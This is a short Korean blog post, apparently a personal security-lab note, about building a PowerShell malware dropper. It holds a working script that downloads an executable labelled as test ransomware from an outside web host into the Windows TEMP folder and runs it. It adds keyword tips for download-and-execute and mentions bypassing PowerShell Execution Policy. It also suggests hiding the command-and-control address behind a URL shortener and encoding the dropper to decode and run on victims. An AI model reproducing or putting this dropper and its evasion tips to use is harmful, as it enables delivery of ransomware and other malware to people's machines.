-
[악성코드] Powershell Dropper with 작업 스케줄러 본문
Notion 백업.
Powershell Dropper 예제
$client = New-Object System.Net.WebClient
$downloadURL = "http://bpsec.co.kr/~minibeef/download/nsr_test_ransomeware.exe"
$path = ($env:TEMP) + "\18e190413af045db88dfbd29609eb877.exe"
$client.DownloadFile($downloadURL, $path)
cd $env:TEMP
./18e190413af045db88dfbd29609eb877.exePowershell Dropper 만들 때 키워드
-
Invoke-Expression: 로컬에서 명령어 실행 -
DownloadString(""): 웹 사이트에서 스트링 형식으로 다운로드 받아 로컬에서 실행 -
DownloadFile(URL, PATH): URL에서 받아 PATH에 저장 → 환경변수($env) 이용할때? -
실제 악성코드는 주로
$env:TEMP에 드랍 → 테스트한 결과 Windows Execution Policy에는 안걸림 → 허나, Bypass 해야하는 경우 다음 링크 참고(PowerShell의 Execution Policy를 우회하는 15가지 방법 -)
C&C 구성 및 개연성 부여
-
FTP혹은HTTP로 다운로드 하도록 만드는 것이 좋을듯 함 -
위의 예제의 경우 apache
public_html활용 -
http://bitly.kr/ 사용하여 C&C 주소 가리기?
-
[아이디어] dropper를 인코딩해서 뿌리고 victim에서 decode&execute
'Workspace' 카테고리의 다른 글
| [악성코드] Windows Malware Persistence (0) | 2020.08.13 |
|---|---|
| [Windows] C 프로그램 백그라운드 실행 (0) | 2020.08.13 |
| [악성코드] CVE-2017-8291 한글 문서(.hwp) 악성코드 (0) | 2020.08.12 |
| [Wireshark] 일정 주기로 PCAP 자동 저장 (0) | 2020.08.12 |
| [Windows] IE 보안 강화 구성 해제 (0) | 2020.08.12 |
'Workspace' Related Articles
more
Comments